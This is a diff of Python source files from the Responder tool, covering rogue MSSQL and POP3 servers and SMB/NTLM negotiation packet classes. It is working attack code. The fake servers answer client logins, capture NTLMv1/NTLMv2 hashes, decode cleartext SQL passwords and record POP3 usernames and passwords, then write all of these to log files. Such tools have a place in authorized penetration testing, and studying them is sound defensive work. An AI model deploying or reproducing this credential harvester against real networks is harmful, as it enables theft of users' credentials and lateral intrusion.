+        CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
+
+        CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
+
+        CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
+
+        self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
+        self.fields["SSPIBuffLen"] = struct.pack("<i",len(CalculateSSPI))[:2]
+        # Target Name Offsets
+        self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
+        self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
+        self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
+        #AvPairs Offsets
+        self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
+        self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
+        self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
+        #AvPairs StrLen
+        self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
+        self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
+        self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
+        self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
+        self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
+        #AvPairs 6 len is always 00.

core/protocols/mssql/MSSQLServer.py

@@ -0,0 +1,128 @@
+import struct
+
+class MSSQLServer():
+
+	def serve_thread_tcp(host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	def start(SQL_On_Off):
+		if SQL_On_Off == "ON":
+			t = threading.Thread(name="MSSQL", target=self.serve_thread_tcp, args=("0.0.0.0", 1433,MSSQL))
+			t.setDaemon(True)
+			t.start()
+			return t
+		if SQL_On_Off == "OFF":
+			return False
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = True
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
+def ParseSQLHash(data,client):
+	SSPIStart = data[8:]
+	LMhashLen = struct.unpack('<H',data[20:22])[0]
+	LMhashOffset = struct.unpack('<H',data[24:26])[0]
+	LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	NthashLen = struct.unpack('<H',data[30:32])[0]
+	if NthashLen == 24:
+		NthashOffset = struct.unpack('<H',data[32:34])[0]
+		NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		DomainLen = struct.unpack('<H',data[36:38])[0]
+		DomainOffset = struct.unpack('<H',data[40:42])[0]
+		Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[44:46])[0]
+		UserOffset = struct.unpack('<H',data[48:50])[0]
+		User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+		outfile = "./logs/responder/MSSQL-NTLMv1-Client-"+client+".txt"
+		WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain)
+		responder_logger.info('[+]MsSQL NTLMv1 hash captured from :%s'%(client))
+		responder_logger.info('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
+		responder_logger.info('[+]MSSQL NTLMv1 Domain is :%s'%(Domain))
+		responder_logger.info('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal))
+	if NthashLen > 60:
+		DomainLen = struct.unpack('<H',data[36:38])[0]
+		NthashOffset = struct.unpack('<H',data[32:34])[0]
+		NthashLen = struct.unpack('<H',data[30:32])[0]
+		Hash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		DomainOffset = struct.unpack('<H',data[40:42])[0]
+		Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[44:46])[0]
+		UserOffset = struct.unpack('<H',data[48:50])[0]
+		User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+		outfile = "./logs/responder/MSSQL-NTLMv2-Client-"+client+".txt"
+		Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper()
+		WriteData(outfile,Writehash,User+"::"+Domain)
+		responder_logger.info('[+]MsSQL NTLMv2 hash captured from :%s'%(client))
+		responder_logger.info('[+]MSSQL NTLMv2 Domain is :%s'%(Domain))
+		responder_logger.info('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
+		responder_logger.info('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash))
+
+def ParseSqlClearTxtPwd(Pwd):
+	Pwd = map(ord,Pwd.replace('\xa5',''))
+	Pw = []
+	for x in Pwd:
+		Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
+	return ''.join(Pw)
+
+def ParseClearTextSQLPass(Data,client):
+	outfile = "./logs/responder/MSSQL-PlainText-Password-"+client+".txt"
+	UsernameOffset = struct.unpack('<h',Data[48:50])[0]
+	PwdOffset = struct.unpack('<h',Data[52:54])[0]
+	AppOffset = struct.unpack('<h',Data[56:58])[0]
+	PwdLen = AppOffset-PwdOffset
+	UsernameLen = PwdOffset-UsernameOffset
+	PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen])
+	UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le')
+	WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr)
+	responder_logger.info('[+]MSSQL PlainText Password captured from :%s'%(client))
+	responder_logger.info('[+]MSSQL Username: %s Password: %s'%(UserName, PwdStr))
+
+
+def ParsePreLoginEncValue(Data):
+	PacketLen = struct.unpack('>H',Data[2:4])[0]
+	EncryptionValue = Data[PacketLen-7:PacketLen-6]
+	if re.search("NTLMSSP",Data):
+		return True
+	else:
+		return False
+
+#MS-SQL server class.
+class MSSQL(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				data = self.request.recv(1024)
+				self.request.settimeout(0.1)
+				##Pre-Login Message
+				if data[0] == "\x12":
+					buffer0 = str(MSSQLPreLoginAnswer())
+					self.request.send(buffer0)
+					data = self.request.recv(1024)
+				##NegoSSP
+				if data[0] == "\x10":
+					if re.search("NTLMSSP",data):
+						t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
+						t.calculate()
+						buffer1 = str(t)
+						self.request.send(buffer1)
+						data = self.request.recv(1024)
+					else:
+						ParseClearTextSQLPass(data,self.client_address[0])
+					##NegoSSP Auth
+				if data[0] == "\x11":
+					ParseSQLHash(data,self.client_address[0])
+		except Exception:
+			pass
+			self.request.close()
+##################################################################################
+#SQL Stuff ends here
+##################################################################################

core/protocols/pop3/POP3Server.py

@@ -0,0 +1,69 @@
+##################################################################################
+#POP3 Stuff starts here
+##################################################################################
+
+class POP3Server():
+
+	def serve_thread_tcp(host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(POP_On_Off):
+		if POP_On_Off == "ON":
+			t = threading.Thread(name="POP", target=serve_thread_tcp, args=("0.0.0.0", 110,POP))
+			t.setDaemon(True)
+			t.start()
+			return t
+		if POP_On_Off == "OFF":
+			return False
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+
+class POPOKPacket(Packet):
+	fields = OrderedDict([
+		("Code",           "+OK"),
+		("CRLF",      "\r\n"),
+	])
+
+#POP3 server class.
+class POP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			self.request.send(str(POPOKPacket()))
+			data = self.request.recv(1024)
+			if data[0:4] == "USER":
+				User = data[5:].replace("\r\n","")
+				responder_logger.info('[+]POP3 User: %s'%(User))
+				t = POPOKPacket()
+				self.request.send(str(t))
+				data = self.request.recv(1024)
+			if data[0:4] == "PASS":
+				Pass = data[5:].replace("\r\n","")
+				Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt"
+				WriteData(Outfile,User+":"+Pass, User+":"+Pass)
+				#print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)
+				responder_logger.info("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass))
+				t = POPOKPacket()
+				self.request.send(str(t))
+				data = self.request.recv(1024)
+			else :
+				t = POPOKPacket()
+				self.request.send(str(t))
+				data = self.request.recv(1024)
+		except Exception:
+			pass
+
+##################################################################################
+#POP3 Stuff ends here
+##################################################################################

core/protocols/smb/SMBPackets.py

@@ -0,0 +1,475 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+#Calculate total SMB packet len.
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+#Set MID SMB Header field.
+def midcalc(data):
+    pack=data[34:36]
+    return pack
+
+#Set UID SMB Header field.
+def uidcalc(data):
+    pack=data[32:34]
+    return pack
+
+#Set PID SMB Header field.
+def pidcalc(data):
+    pack=data[30:32]
+    return pack
+
+#Set TID SMB Header field.
+def tidcalc(data):
+    pack=data[28:30]
+    return pack
+
+
+##################################################################################
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("errorcode", "\x00\x00\x00\x00" ),
+        ("flag1", "\x00"),
+        ("flag2", "\x00\x00"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x00\x00"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+##################################################################################
+#SMB Negotiate Answer LM packet.
+class SMBNegoAnsLM(Packet):
+    fields = OrderedDict([
+        ("Wordcount",    "\x11"),
+        ("Dialect",      ""),
+        ("Securitymode", "\x03"),
+        ("MaxMpx",       "\x32\x00"),
+        ("MaxVc",        "\x01\x00"),
+        ("Maxbuffsize",  "\x04\x41\x00\x00"),
+        ("Maxrawbuff",   "\x00\x00\x01\x00"),
+        ("Sessionkey",   "\x00\x00\x00\x00"),
+        ("Capabilities", "\xfc\x3e\x01\x00"),
+        ("Systemtime",   "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
+        ("Srvtimezone",  "\x2c\x01"),
+        ("Keylength",    "\x08"),
+        ("Bcc",          "\x10\x00"),
+        ("Key",          ""),
+        ("Domain",       "SMB"),
+        ("DomainNull",   "\x00\x00"),
+        ("Server",       "SMB-TOOLKIT"),
+        ("ServerNull",   "\x00\x00"),
+    ])
+
+    def calculate(self):
+        ##Convert first..
+        self.fields["Domain"] = self.fields["Domain"].encode('utf-16le')
+        self.fields["Server"] = self.fields["Server"].encode('utf-16le')
+        ##Then calculate.
+        CompleteBCCLen =  str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"])
+        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
+        self.fields["Keylength"] = struct.pack("<h",len(self.fields["Key"]))[0]
+##################################################################################
+#SMB Negotiate Answer ESS NTLM only packet.
+class SMBNegoAns(Packet):
+    fields = OrderedDict([
+        ("Wordcount",    "\x11"),
+        ("Dialect",      ""),
+        ("Securitymode", "\x03"),
+        ("MaxMpx",       "\x32\x00"),
+        ("MaxVc",        "\x01\x00"),
+        ("MaxBuffSize",  "\x04\x41\x00\x00"),
+        ("MaxRawBuff",   "\x00\x00\x01\x00"),
+        ("SessionKey",   "\x00\x00\x00\x00"),
+        ("Capabilities", "\xfd\xf3\x01\x80"),
+        ("SystemTime",   "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
+        ("SrvTimeZone",  "\xf0\x00"),
+        ("KeyLen",    "\x00"),
+        ("Bcc",          "\x57\x00"),
+        ("Guid",         "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
+        ("InitContextTokenASNId",     "\x60"),
+        ("InitContextTokenASNLen",    "\x5b"),
+        ("ThisMechASNId",             "\x06"),
+        ("ThisMechASNLen",            "\x06"),
+        ("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),
+        ("SpNegoTokenASNId",          "\xA0"),
+        ("SpNegoTokenASNLen",         "\x51"),
+        ("NegTokenASNId",             "\x30"),
+        ("NegTokenASNLen",            "\x4f"),
+        ("NegTokenTag0ASNId",         "\xA0"),
+        ("NegTokenTag0ASNLen",        "\x30"),
+        ("NegThisMechASNId",          "\x30"),
+        ("NegThisMechASNLen",         "\x2e"),
+        ("NegThisMech4ASNId",         "\x06"),
+        ("NegThisMech4ASNLen",        "\x09"),
+        ("NegThisMech4ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
+        ("NegTokenTag3ASNId",         "\xA3"),
+        ("NegTokenTag3ASNLen",        "\x1b"),
+        ("NegHintASNId",              "\x30"),
+        ("NegHintASNLen",             "\x19"),
+        ("NegHintTag0ASNId",          "\xa0"),
+        ("NegHintTag0ASNLen",         "\x17"),
+        ("NegHintFinalASNId",         "\x1b"), 
+        ("NegHintFinalASNLen",        "\x15"),
+        ("NegHintFinalASNStr",        "server2008$@SMB.LOCAL"),
+    ])
+
+    def calculate(self):
+
+        CompleteBCCLen1 =  str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
+
+        Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
+        self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
+        self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
+        self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
+        self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
+        self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
+        self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
+        self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
+        self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
+        self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
+        self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
+        self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
+
+################################################################################
+#SMB Negotiate Answer ESS NTLM and Kerberos packet.
+class SMBNegoKerbAns(Packet):
+    fields = OrderedDict([
+        ("Wordcount",                "\x11"),
+        ("Dialect",                  ""),
+        ("Securitymode",             "\x03"),
+        ("MaxMpx",                   "\x32\x00"),
+        ("MaxVc",                    "\x01\x00"),
+        ("MaxBuffSize",              "\x04\x41\x00\x00"),
+        ("MaxRawBuff",               "\x00\x00\x01\x00"),
+        ("SessionKey",               "\x00\x00\x00\x00"),
+        ("Capabilities",             "\xfd\xf3\x01\x80"),
+        ("SystemTime",               "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
+        ("SrvTimeZone",               "\xf0\x00"),
+        ("KeyLen",                    "\x00"),
+        ("Bcc",                       "\x57\x00"),
+        ("Guid",                      "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
+        ("InitContextTokenASNId",     "\x60"),
+        ("InitContextTokenASNLen",    "\x5b"),
+        ("ThisMechASNId",             "\x06"),
+        ("ThisMechASNLen",            "\x06"),
+        ("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),
+        ("SpNegoTokenASNId",          "\xA0"),
+        ("SpNegoTokenASNLen",         "\x51"),
+        ("NegTokenASNId",             "\x30"),
+        ("NegTokenASNLen",            "\x4f"),
+        ("NegTokenTag0ASNId",         "\xA0"),
+        ("NegTokenTag0ASNLen",        "\x30"),
+        ("NegThisMechASNId",          "\x30"),
+        ("NegThisMechASNLen",         "\x2e"),
+        ("NegThisMech1ASNId",         "\x06"),
+        ("NegThisMech1ASNLen",        "\x09"),
+        ("NegThisMech1ASNStr",        "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
+        ("NegThisMech2ASNId",         "\x06"),
+        ("NegThisMech2ASNLen",        "\x09"),
+        ("NegThisMech2ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
+        ("NegThisMech3ASNId",         "\x06"),
+        ("NegThisMech3ASNLen",        "\x0a"),
+        ("NegThisMech3ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
+        ("NegThisMech4ASNId",         "\x06"),
+        ("NegThisMech4ASNLen",        "\x09"),
+        ("NegThisMech4ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
+        ("NegTokenTag3ASNId",         "\xA3"),
+        ("NegTokenTag3ASNLen",        "\x1b"),
+        ("NegHintASNId",              "\x30"),
+        ("NegHintASNLen",             "\x19"),
+        ("NegHintTag0ASNId",          "\xa0"),
+        ("NegHintTag0ASNLen",         "\x17"),
+        ("NegHintFinalASNId",         "\x1b"), 
+        ("NegHintFinalASNLen",        "\x15"),
+        ("NegHintFinalASNStr",        "server2008$@SMB.LOCAL"),
+    ])
+
+    def calculate(self):
+
+        CompleteBCCLen1 =  str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
+
+        Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
+        self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
+        self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
+        self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
+        self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
+        self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
+        self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
+        self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
+        self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
+        self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
+        self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
+        self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
+        self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
+        self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
+################################################################################
+class SMBSession1Data(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x04"),
+        ("AndXCommand",           "\xff"),
+        ("Reserved",              "\x00"),
+        ("Andxoffset",            "\x5f\x01"),
+        ("Action",                "\x00\x00"),
+        ("SecBlobLen",            "\xea\x00"),
+        ("Bcc",                   "\x34\x01"),
+        ("ChoiceTagASNId",        "\xa1"), 
+        ("ChoiceTagASNLenOfLen",  "\x81"), 
+        ("ChoiceTagASNIdLen",     "\x00"),
+        ("NegTokenTagASNId",      "\x30"),
+        ("NegTokenTagASNLenOfLen","\x81"),
+        ("NegTokenTagASNIdLen",   "\x00"),
